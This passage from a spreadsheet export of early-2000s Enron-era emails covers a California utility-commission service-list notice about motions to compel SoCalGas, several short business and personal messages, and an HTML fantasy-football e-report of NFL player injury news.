grant_kolling@cerberus.city.palo-alto.ca.us; Sullivan, Glen J.; _x000D_
gtbl@dynegy.com; iep@iepa.com; igsinc@ix.netcom.com; inggm@sce.com; _x000D_
jcattermole@pcenergy.com; jkarp@whitecase.com; jleslie@luce.com; _x000D_
jmct@gmssr.com; jmpa@dynegy.com; johnj@bcjlaw.com; joseh@lif.org; _x000D_
jsteffen@iid.com; jweil@aglet.org; jwr@cpuc.ca.gov; karen@klindh.com; _x000D_
karpjos@sf.whitecase.com; kfyip@seiworldwide.com; kmccrea@sablaw.com; _x000D_
kmills@cfbf.com; lindseyhowdowning@dwt.com; lmh@eslawfirm.com; _x000D_
ltt@cpuc.ca.gov; mark.c.moench@wgp.twc.com; mcn@cpuc.ca.gov; _x000D_
mday@gmssr.com; mdjoseph@adamsbroadwell.com; mjaske@energy.state.ca.us; _x000D_
napedersen@jonesday.com; pjpowerlaw@aol.com; plg@cpuc.ca.gov; _x000D_
ram@cpuc.ca.gov; raveen_maan@cerberus.city.palo-alto.ca.us; _x000D_
raw@cpuc.ca.gov; rbw@mrwassoc.com; rczahar@aol.com; _x000D_
rgloistein@orrick.com; rick.counihan@greenmountain.com; rmp@cpuc.ca.gov; _x000D_
rochmanm@cubjpa.org; rochmanm@spurr.org; ron_oechsler@rmiinc.com; _x000D_
ronknecht@aol.com; rpelote@energy.twc.com; rpetti@ladwp.com; _x000D_
salleyoo@dwt.com; sbs@cpuc.ca.gov; skatz@sempratrading.com; _x000D_
slins@ci.glendale.ca.us; sscott3@enron.com; stomashe@energy.state.ca.us; _x000D_
tah@cpuc.ca.gov; tdickers@westerngas.com; tom.roth@et.pge.com; _x000D_
vjb@cpuc.ca.gov; 'hawiger, marcel' _x000D_
Subject: RE: I.99-07-003 _x000D_
_x000D_
Judge Biren has asked me to convey the following information to the service _x000D_
list in this proceeding: _x000D_
_x000D_
In addition to TURN's motion (as circulated by TURN's email on Monday, May _x000D_
15) to compel? SoCalGas to answer portions of TURN's data request dated _x000D_
April 27, 2000, the Southern California Generation Coalition has indicated _x000D_
to the ALJ its intent to file a motion to compel SoCalGas to answer the same _x000D_
questions asked by TURN.? SCGC has said it probably will seek to compel _x000D_
SoCalGas to answer all questions originally asked by TURN, including those _x000D_
questions that TURN's motion did not seek to compel SoCalGas to answer. _x000D_
SCGC has said it will try to file this motion today or tomorrow.? Counsel _x000D_
for SCGC has informed me that he does not intend to file a motion to compel _x000D_
answers to these questions by any other parties. _x000D_
_x000D_
Counsel for TURN has informed me that it does not intend to file a motion to _x000D_
compel other parties to whom it sent its April 27 data request to answer any _x000D_
of those questions, but that TURN is not now willing to waive any right to _x000D_
file such a motion. _x000D_
_x000D_
The ALJ has stated her intent to rule on the TURN motion and the expected _x000D_
SCGC motion at the PHC on Thurs. May 25.? SoCalGas has agreed to file a _x000D_
written response by Tues. May 23, as TURN had proposed.? The ALJ does not _x000D_
intend to issue a formal, written ruling shortening time to respond to the _x000D_
motions, but wants to be sure parties understand her intent on how she will _x000D_
proceed in resolving this matter. _x000D_
_x000D_
-- Glen Sullivan _x000D_
Sempra Energy Law Dept. _x000D_
tel:? (619) 699-5162 _x000D_
email:? gsullivan@sempra.com _x000D_
Attorney for SoCalGas and SDG&amp;E </t>
  </si>
  <si>
    <t>Tue, 25 Jul 2000 09:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'paul.rodrigue@trin.net'})</t>
  </si>
  <si>
    <t>Re: B-Day's</t>
  </si>
  <si>
    <t>Hey,_x000D_
_x000D_
I did think of something Dad might want.  He was really excited when mom gave _x000D_
him the Biblical reference book for Father's day, so maybe we could get him _x000D_
something like that.  Call mom and ask her what he wants.  _x000D_
_x000D_
Authur Anderson, huh??  You do know they are slave drivers, right??  Of _x000D_
course I'm sure it's no worse than my current job!!  I find it pretty funny _x000D_
that you wrote that to my from your work email.   _x000D_
_x000D_
Well it's about time I got started working today._x000D_
_x000D_
Robin</t>
  </si>
  <si>
    <t>Wed, 12 Jan 2000 09:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Clarke Mobile</t>
  </si>
  <si>
    <t>I'm still reviewing the ISDA but I asked Marie to prepare an omnibus to send _x000D_
Thurs. morning.  SS</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 08:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Conference call scheduled Friday, June 8th at 11:00 a.m. EST</t>
  </si>
  <si>
    <t xml:space="preserve">Don't know if I'll participate, but please put on calendar anyway._x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 06/06/2001 03:38 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
MedleyB@gtlaw.com on 06/06/2001 01:55:26 PM_x000D_
To: ben.jacoby@enron.com, kay.mann@enron.com, Steven.Krimsky@enron.com, _x000D_
Steven.Rose@enron.com, Dave.Kellermeyer@enron.com, KBrown00@bellsouth.net, _x000D_
bkeith@keith-associates.com, BarshK@gtlaw.com_x000D_
cc: OrshefskyD@GTLAW.com _x000D_
_x000D_
Subject: Conference call scheduled Friday, June 8th at 11:00 a.m. EST_x000D_
_x000D_
Dial in 1-888-385-5669_x000D_
Participant #7688234_x000D_
_x000D_
Rebecca C. Medley_x000D_
(954) 768-8230_x000D_
Assistant to Debbie M. Orshefsky_x000D_
and Frank Schnidman_x000D_
_x000D_
_x000D_
_x000D_
_______________________________________________________________ _x000D_
The information contained in this transmission may contain _x000D_
privileged and confidential information.  It is intended only _x000D_
for the use of the person(s) named above. If you are not the _x000D_
intended recipient,  you are hereby notified that any review, _x000D_
dissemination, distribution or duplication of this _x000D_
communication is strictly prohibited. If you are not the _x000D_
intended recipient, please contact the sender by reply email _x000D_
and destroy all copies of the original message. _x000D_
_x000D_
To reply to our email administrator directly, please send an _x000D_
email to postmaster@gtlaw.com._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Mar 2000 10:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'awenner@velaw.com'})</t>
  </si>
  <si>
    <t>frozenset({'jhartso@enron.com', 'steven.kean@enron.com', 'csandhe@enron.com'})</t>
  </si>
  <si>
    <t>Kean Revisions.DOC</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;Kean Revisions.DOC&gt;&gt;    Attached is a revised draft of the transmission_x000D_
legislation, which responds to Steve Kean's comments._x000D_
_x000D_
 - Kean Revisions.DOC</t>
  </si>
  <si>
    <t>Mon, 3 Jul 2000 06:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brian.barto@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'cheryl.costa@enron.com', 'kathleen.clark@enron.com'})</t>
  </si>
  <si>
    <t>GE Standared Indemnification Language</t>
  </si>
  <si>
    <t xml:space="preserve">Sheila:_x000D_
_x000D_
Per our last World Hunger meeting: Review GE Indemnity Language in theire _x000D_
Standard.  Upon inspection of GE's standard selling terms, I must report that _x000D_
the only indemnity GE provides is for Patent infringement.  Their document is _x000D_
silent on third party personal injury and property damage, and silent on _x000D_
hazardous materials.  Their standard language also stipulates limit of _x000D_
liability being capped at the purchase price for any and all claims._x000D_
_x000D_
Looks like we should take the lead on drafting language if we do not like _x000D_
what is in place now.  GE does not seem likely to volunteer to make it more _x000D_
fair or any better. </t>
  </si>
  <si>
    <t>Fri, 13 Apr 2001 14:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Party, Party, Party (at Sandeep's new house)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/13/2001 _x000D_
09:08 PM ---------------------------_x000D_
_x000D_
_x000D_
Shirley Crenshaw_x000D_
04/13/2001 06:37 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Stinson Gibner/HOU/ECT@ECT, Pinnamaneni _x000D_
Krishnarao/HOU/ECT@ECT, Vasant Shanbhogue/HOU/ECT@ECT, Mike A _x000D_
Roberts/HOU/ECT@ECT, Joseph Hrgovcic/HOU/ECT@ECT, Tanya _x000D_
Tamarchenko/HOU/ECT@ECT, Zimin Lu/HOU/ECT@ECT, Martin Lin/HOU/ECT@ECT, _x000D_
Maureen Raymond/LON/ECT@ECT, Osman Sezgen/HOU/EES@EES, Paulo _x000D_
Issler/HOU/ECT@ECT, Amitava Dhar/Corp/Enron@ENRON, Alex _x000D_
Huang/Corp/Enron@ENRON, Kevin G Moore/HOU/ECT@ECT, William _x000D_
Smith/Corp/Enron@Enron, Jose Marquez/Corp/Enron@ENRON, Chonawee _x000D_
Supatgiat/Corp/Enron@Enron, Shalesh Ganjoo/HOU/ECT@ECT, Tom _x000D_
Halliburton/Corp/Enron@Enron, Elena Chilkina/Corp/Enron@Enron, Sevil _x000D_
Yaman/Corp/Enron@Enron, Sofya Tamarchenko/NA/Enron@Enron, Bob _x000D_
Lee/NA/Enron@Enron, Gwyn Koepke/NA/Enron@Enron, Hector Campos/HOU/ECT@ECT, _x000D_
Anita DuPont/NA/Enron@ENRON, Youyi Feng/NA/Enron@Enron, Praveen _x000D_
Mellacheruvu/HOU/EES@EES, Stephen Bennett/NA/Enron@ENRON, Roman _x000D_
Zadorozhny/HOU/EES@EES, Lance Cunningham/NA/Enron@ENRON, Leann _x000D_
Walton/NA/Enron@ENRON, Shane Green/HOU/EES@EES, Seksan _x000D_
Kiatsupaibul/HOU/EES@EES, Kate Lucas/HOU/ECT@ECT, Nelson _x000D_
Neale/NA/Enron@Enron, Rabi De/NA/Enron@ENRON, Kenneth _x000D_
Parkhill/NA/Enron@ENRON, Jaesoo Lew/NA/Enron@ENRON, Jason _x000D_
Sokolov/HOU/ECT@ECT, Steve Bigalow/NA/Enron@Enron, Tom _x000D_
Barkley/NA/Enron@Enron, Rakesh Bharati/NA/Enron@Enron, Wichai _x000D_
Narongwanich/HOU/EES@EES, Sandeep Kohli@Enron, Iris Mack/ENRON@enronXgate, _x000D_
Mitra Mujica/ENRON@enronXgate_x000D_
cc:  _x000D_
Subject: Party, Party, Party (at Sandeep's new house)_x000D_
_x000D_
Hi everyone:_x000D_
_x000D_
Please mark Saturday, May 5th on your calendar.  Sandeep is_x000D_
having everyone over to his new house! _x000D_
_x000D_
DETAILS TO FOLLOW!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 30 Dec 2001 08:15:18 -0800 (PST)</t>
  </si>
  <si>
    <t>Commissioner.COM E-Reports for Evil Empire 12/30/01</t>
  </si>
  <si>
    <t>&lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;&lt;html&gt;&lt;HEAD&gt;_x000D_
&lt;!--_x000D_
_x000D_
_x000D_
You are receiving these e-reports because you have signed up for_x000D_
CBS SportsLine.com Fantasy Football.  The default format for these_x000D_
reports is HTML, however if you are reading this text your_x000D_
mail reader is not displaying it as HTML.  To change to_x000D_
text mode, or to customize, reschedule, or turn off these_x000D_
reports please to to the URL below:_x000D_
_x000D_
http://football292.fantasy.sportsline.com/mp/options-ereports?league=ee&amp;owner=96876.9_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--&gt;_x000D_
_x000D_
&lt;BASE HREF="http://football292.fantasy.sportsline.com/mp/"&gt;_x000D_
&lt;/HEAD&gt;&lt;BODY TEXT="#00000" ALINK="#ffff00" LINK="#0000ff" VLINK="#0000ff" BGCOLOR=#000099&gt;&lt;CENTER&gt;&lt;TABLE BORDER=0 WIDTH=716 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD&gt;&lt;A HREF=http://www.sportsline.com/links/6/1/163/sffer1225th.cgi&gt;&lt;IMG BORDER=0 SRC=http://images.commissioner.com/images/splash/football/SPLN_mgmt_ereport_header.gif&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;&lt;TABLE WIDTH=100% CELLPADDING=10 CELLSPACING=0 BORDER=0 BGCOLOR="#ffffff"&gt;&lt;TR&gt;&lt;TD&gt;Attention Fantasy Members! It's time to get an early start on that New Year's resolution. MVP.com is offering FREE Standard Shipping in our Fitness Shop until 1/17/02. &lt;a href="http://www.sportsline.com/links/6/1/217/sffer1228e.cgi"&gt;Click here to see what we have to offer.&lt;/a&gt;&lt;BR&gt;_x000D_
&lt;BR&gt; _x000D_
Save $.05 a gallon on the gas that keeps your car's engine clean. &lt;a href="http://www.sportsline.com/links/6/1/226/sffer1228c.cgi"&gt;Click here&lt;/a&gt; to apply online.&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;a href="http://www.sportsline.com/links/6/1/223/sffer1228v.cgi"&gt;Win&lt;/a&gt; a VIP Vegas Vacation! OR &lt;a href="http://www.sportsline.com/links/6/1/223/sffer1228v.cgi"&gt;Win&lt;/a&gt; $600 CASH!&lt;/a&gt;&lt;BR&gt;  _x000D_
&lt;BR&gt;_x000D_
_x000D_
	&lt;table width="100%" border=0 cellpadding=3 cellspacing=0&gt;_x000D_
	&lt;TR&gt;&lt;TD bgcolor=black&gt;&lt;FONT FACE="verdana,arial,helvetica" size=1_x000D_
color=white&gt;&lt;B&gt;Brought to you by&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
	&lt;/TABLE&gt;_x000D_
	&lt;TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0"&gt;_x000D_
&lt;TR&gt;_x000D_
&lt;TD colspan=2&gt;_x000D_
&lt;IMG SRC="http://images.commissioner.com/images/ads/ereports/sponsorbar16.gif" USEMAP="#menu.map" width="417" height="25" border="0" ALT="Sponsorship Bar"&gt;&lt;/TD&gt;_x000D_
&lt;/TR&gt;_x000D_
&lt;MAP NAME="menu.map"&gt;_x000D_
&lt;AREA shape="rect" coords="0, 1, 83, 25"_x000D_
href="http://www.sportsline.com/links/6/1/217/sffer1228e.cgi"&gt;_x000D_
_x000D_
&lt;AREA shape="rect" coords="83, 1, 166, 25"_x000D_
href="http://www.sportsline.com/links/6/1/226/sffer1228c.cgi"&gt;_x000D_
 _x000D_
&lt;AREA shape="rect" coords="166, 1, 249, 25"_x000D_
href="http://www.sportsline.com/links/6/1/223/sffer1228v.cgi"&gt;_x000D_
 _x000D_
&lt;AREA shape="rect" coords="249, 1, 332, 25"_x000D_
href="http://www.sportsline.com/links/6/1/163/sffer1228t.cgi"&gt;_x000D_
_x000D_
&lt;AREA shape="rect" coords="332, 1, 415, 25"_x000D_
href="http://www.sportsline.com/links/6/5/3/sffer1227ftl.cgi"&gt;_x000D_
 _x000D_
&lt;/MAP&gt;_x000D_
_x000D_
&lt;/TABLE&gt;_x000D_
&lt;BR&gt;You are receiving these e-reports because you have signed up for_x000D_
    CBS SportsLine.com Fantasy Football.  To customize, reschedule,_x000D_
    or turn off these reports please _x000D_
    &lt;A HREF=http://football292.fantasy.sportsline.com/mp/options-ereports?league=ee&amp;owner=96876.9&gt;click here&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;NFL Reports,&amp;nbsp;Player Update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FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=4&gt;Latest NFL Player News&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=12363&amp;"&gt;&lt;B&gt;Jay Fiedler&lt;/B&gt;&lt;/A&gt;, QB MIA - Free Agent &lt;FONT SIZE=1&gt;Updated 12/29/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Fiedler has been added to Miami's injury report with a sore throwing elbow. He is listed as probable for Sunday's game against Atlanta, and is expected to start.  If you're desperate for a quarterback, Fiedler's matchup vs. the Falcons is a good one. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1069&amp;"&gt;&lt;B&gt;Steve McNair&lt;/B&gt;&lt;/A&gt;, QB TEN - McKay &lt;FONT SIZE=1&gt;Updated 12/29/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
McNair was excused from practice on Friday due to a family illness. He is listed as questionable for Sunday's game against Cleveland, but he's expected to start. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=188491&amp;"&gt;&lt;B&gt;Larry Foster&lt;/B&gt;&lt;/A&gt;, WR DET - Free Agent &lt;FONT SIZE=1&gt;Updated 12/29/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Foster (thigh) is expected to play in Sunday's game against Chicago. However, he is far too risky to start at this point in the Fantasy season. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1186&amp;"&gt;&lt;B&gt;Bert Emanuel&lt;/B&gt;&lt;/A&gt;, WR DET - McKay &lt;FONT SIZE=1&gt;Updated 12/29/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Emanuel (knee) is expected to play on Sunday against Chicago. However, he's too risky to start at this point in the Fantasy Football season. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1203&amp;"&gt;&lt;B&gt;Muhsin Muhammad&lt;/B&gt;&lt;/A&gt;, WR CAR - TayDang &lt;FONT SIZE=1&gt;Updated 12/29/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Muhammad (turf toe) will not play this week, and may miss the rest of the season. Isaac Byrd will likely start in his place again. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=27&amp;"&gt;&lt;B&gt; Seahawks&lt;/B&gt;&lt;/A&gt;, DT SEA - TayDang &lt;FONT SIZE=1&gt;Updated 12/29/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
CB Shawn Springs, who was suspended for the past four games, will not start on Sunday against San Diego. He may play a reserve role, however, but his playing time will likely be limited. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1871&amp;"&gt;&lt;B&gt;Todd Bouman&lt;/B&gt;&lt;/A&gt;, QB MIN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/29/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Bouman will miss Sunday's game against Green Bay due to a thumb injury. Spergon Wynn will start in his place. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=187690&amp;"&gt;&lt;B&gt;Spergon Wynn&lt;/B&gt;&lt;/A&gt;, QB MIN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/29/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Wynn will start Sunday's game against the Green Bay Packers in place of the injured Todd Bouman. Wynn, who played in most of last week's loss to Jacksonville, is far too inexperienced to start this deep into the Fantasy season. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1041&amp;"&gt;&lt;B&gt;Drew Bledsoe&lt;/B&gt;&lt;/A&gt;, QB NE - Top Dogs &lt;FONT SIZE=1&gt;Updated 12/29/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;According to published reports, the Chicago Bears are interested in acquiring Bledsoe. With Tom Brady seemingly entrenched as New England's quarterback, it seems that Bledsoe has become expendable to the Patriots. The move would certainly improve the Bears' passing game, but no deals would likely be made until sometime in the spring. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=133297&amp;"&gt;_x000D_
&lt;B&gt;Martin Gramatica&lt;/B&gt;&lt;/A&gt;, K TB - TexOK &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Gramatica has still not been ruled out for Saturday's game, although the Buccaneers have signed veteran kicker Doug Brien as insurance. Even if Gramatica can play, he will be a very risky Fantasy starter. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1171&amp;"&gt;&lt;B&gt;Warrick Dunn&lt;/B&gt;&lt;/A&gt;, RB TB - TexOK &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Dunn's status is day to day with a toe injury. He is expected to play this week, but Mile Alstott has been the most productive back on the team in recent weeks. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1310&amp;"&gt;&lt;B&gt;Michael Westbrook&lt;/B&gt;&lt;/A&gt;, WR WAS - McKay &lt;FONT SIZE=1&gt;_x000D_
Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Westbrook's status is day to day with a knee injury. He is expected to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=133322&amp;"&gt;&lt;B&gt;MarTay Jenkins&lt;/B&gt;&lt;/A&gt;, WR ARI - Free Agent &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Jenkins may miss his second consecutive game with an ankle injury this week. Arnold Jackson would replace him as Arizona's third receiver.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=12366&amp;"&gt;&lt;B&gt;Brian Finneran&lt;/B&gt;&lt;/A&gt;, WR ATL - Free Agent &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Finneran is listed as probable with a knee injury. He is expected to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1499&amp;"&gt;&lt;B&gt;Tyrone Davis&lt;/B&gt;&lt;/A&gt;, TE GB - Free Agent &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Davis has been elevated to the No. 2 tight end slot over rookie David Martin. He will see a considerable amount of playing time now that he is healthy, because Green Bay employs many double tight end sets in the red zone. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1612&amp;"&gt;&lt;B&gt;Oronde Gadsden&lt;/B&gt;&lt;/A&gt;, WR MIA - Free Agent &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Gadsden has been practicing this week and may be able to play. But his hamstring injury may limit his productivity. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1069&amp;"&gt;&lt;B&gt;Steve McNair&lt;/B&gt;&lt;/A&gt;, QB TEN - McKay &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;McNair was limited in practice on Thursday. He is still expected to play this week, but he is a risky Fantasy starter because he will be less than 100 percent healthy. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1236&amp;"&gt;&lt;B&gt;Jimmy Smith&lt;/B&gt;&lt;/A&gt;, WR JAC - Hardtail Amigos &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Smith (flu) has missed practice time this week. He is still expected to play. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1511&amp;"&gt;&lt;B&gt;Joe Horn&lt;/B&gt;&lt;/A&gt;, WR NO - Free Agent &lt;FONT SIZE=1&gt;_x000D_
Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Horn suffered a minor shoulder injury in practice on Thursday. He is expected to start this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=187642&amp;"&gt;&lt;B&gt;Aaron Shea&lt;/B&gt;&lt;/A&gt;, TE CLE - Free Agent &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Shea (shoulder) has been placed on injured reserve. O.J. Santiago will continue to be Cleveland's No. 1 tight end while he is out. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=192266&amp;"&gt;&lt;B&gt;Jason Brookins&lt;/B&gt;&lt;/A&gt;, RB BAL - Free Agent &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Brookins has returned to practice and is listed as probable. But he still may not see any game action until Week 17.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1094&amp;"&gt;&lt;B&gt;Emmitt Smith&lt;/B&gt;&lt;/A&gt;, RB DAL - Pink Panthers &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Micahel Wiley may miss this week's game with a hip injury. Smith is expected to appear on third downs this week as well as assuming his normal workload. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1859&amp;"&gt;&lt;B&gt;James Thrash&lt;/B&gt;&lt;/A&gt;, WR PHI - Free Agent &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Thrash (ankle) returned to practice on Thursday. he is expected to play this week. 